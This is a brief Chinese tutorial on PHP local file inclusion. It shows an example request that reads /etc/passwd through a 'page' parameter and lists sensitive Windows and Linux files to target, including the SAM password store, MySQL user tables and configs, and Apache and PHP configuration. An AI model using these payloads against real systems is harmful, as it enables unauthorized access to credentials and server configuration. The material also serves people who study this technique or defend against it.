PHP文件包含利用
(1). 读取敏感文件
访问:
http://www.xxser.com/index.php?page=/etc/password
如果目标主机文件存在,并切有相应的权限,就可以读出文件的内容。反之,会得到一个类似与: open_basedirrestriction in effect的警告
常见敏感信息如下:
win:
C:\boot.ini //查看系统版本
C:\windows\system32\instsrv\MetaBase.xml //IIS配置文件
C:\windows\repair\sam //存储Windows系统初次安装的密码
C:\Program Files\mysql\my.ini //mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
UNIX/Linux
/etc/passwd
/usr/local/app/apache2/conf/extra/httped-vhosts.conf //虚拟网络设置
/usr/local/app/apache2/conf/httpd.conf //apache2默认配置文件
/usr/local/app/php5/lib/php.ini //php相关设置
/etc/httpd/conf/httpd.conf //apache配置文件
/etc/my.conf //Mysql配置文件